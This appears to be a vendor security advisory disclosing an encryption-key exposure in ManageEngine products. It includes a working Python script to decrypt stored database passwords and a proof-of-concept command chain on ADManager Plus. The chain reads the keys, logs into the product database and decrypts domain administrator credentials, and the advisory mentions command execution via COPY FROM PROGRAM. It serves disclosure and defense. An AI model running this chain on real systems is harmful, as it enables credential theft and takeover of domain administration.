Synopsis
An information disclosure vulnerability exists in multiple ManageEngine products that can result in encryption keys being exposed. A low-privileged OS user with access to the host where an affected ManageEngine product is installed can view and use the exposed key to decrypt product database passwords. This allows the user to access the ManageEngine product database.
An encryption key is stored in the "CryptTag" configuration in <PRODUCT_INSTALLATION_DIR>\conf\customer-config.xml.
The ManageEngine product database usernames and passwords can be found in <PRODUCT_INSTALLATION_DIR>\conf\database_params.conf.
A database password can be decrypted with the following python script (me_decrypt.py):
import sys
from Crypto.Cipher import AES
from Crypto.Protocol.KDF import PBKDF2
from Crypto.Hash import SHA1
from Crypto.Util.Padding import unpad
data = bytearray.fromhex(sys.argv[1])
pw = sys.argv[2]
salt = data[:20]
key = PBKDF2(pw, salt, 32, 65556, None, SHA1)
cipher = AES.new(key, AES.MODE_CBC, iv=b'\x00'*16)
print(unpad(cipher.decrypt(data[20:]),16).decode())
'''
Usage:
me_decrypt.py <encrypted_data_in_hexstr> <key>
me_decrypt.py <password_in_database_params.conf> <CryptTag_in_customer-config.xml>
python3 me_decrypt.py 'd7910c7070b09da8598b35837122217739c728f09d05354e45f7ebbe3f027781b04d2a1c' 'rfMtKVF1cDxUc0DBov8x'
wkd4uzEHFs
'''
With access to the product database, an attacker can perform the following:
- Run OS commands (i.e., via COPY ... FROM PROGRAM '<command>') with privileges of the user account running the database server. This account is usually SYSTEM or some other administrative account.
- Modify the database to reset the password of an administrative user for the product.
- View data contents to reveal other sensitive information.
Proof of Concept:
To view domain administrative credentials in ADManager Plus build 7182:
# Verify a low-privileged domain user (duser1) is logged in
PS C:\Program Files\ManageEngine\ADManager Plus> whoami /user /groups
USER INFORMATION
User Name SID
========= ==============================================
dw\duser1 S-1-5-21-1667561354-2975149694-3384506032-1605
GROUP INFORMATION
Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Desktop Users Alias S-1-5-32-555 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\REMOTE INTERACTIVE LOGON Well-known group S-1-5-14 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PS C:\Program Files\ManageEngine\ADManager Plus>
# Get product database username and password (encrypted)
PS C:\Program Files\ManageEngine\ADManager Plus> Select-String "(username|password)=" .\conf\database_params.conf | select -ExpandProperty line
username=admanager
password=af7638bf753b03f6eaa449be8d030589217b21d3e6ddff8adabe22aed1eebcb11f9b3b40
# Get ECTag (encryption key for domain passwords) and CryptTag (encryption key for DB passwords)
PS C:\Program Files\ManageEngine\ADManager Plus> Select-String "(ECTag|CryptTag)" .\conf\customer-config.xml | select -ExpandProperty line
<configuration name="ECTag" value="4e2e52c9c79f1b26dbe59981ab967a9cf3dd21cac24ec3905214be3eac828f19205a53709cce42bd082c8e821128ad751051f668"/>
<configuration name="CryptTag" value="hYC1D8l2-DgXdVVYPIZN"/>
Decrypt database password using CryptTag as key
python3 me_decrypt.py 'af7638bf753b03f6eaa449be8d030589217b21d3e6ddff8adabe22aed1eebcb11f9b3b40' 'hYC1D8l2-DgXdVVYPIZN'
4p4HvCJsRC
# Decrypt ECTag using CryptTag as key
python3 me_decrypt.py '4e2e52c9c79f1b26dbe59981ab967a9cf3dd21cac24ec3905214be3eac828f19205a53709cce42bd082c8e821128ad751051f668' 'hYC1D8l2-DgXdVVYPIZN'
uBXejNXJxqYn7WeL
# Login to the database using decrypted password
PS C:\Program Files\ManageEngine\ADManager Plus> $Env:PGPASSWORD="4p4HvCJsRC"
PS C:\Program Files\ManageEngine\ADManager Plus> .\pgsql\bin\psql.exe -h 127.0.0.1 -p 33306 -d adsm -U admanager -q
adsm=>
# Grab domain administrative credentials
domain passwords are decrypted by using decypted ECTag as key
adsm=> select domain_name, user_name, pgp_sym_decrypt(password,'uBXejNXJxqYn7WeL','cipher-algo=aes256') AS "password" from ADSCredentials;
domain_name | user_name | password
-------------+---------------+----------
<REDACTED> | administrator | <REDACTED>
Solution
Apply the appropriate vendor supplied patch.
Disclosure Timeline
All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.
Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.
For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.
If you have questions or corrections about this advisory, please email [email protected]
Contact our sales team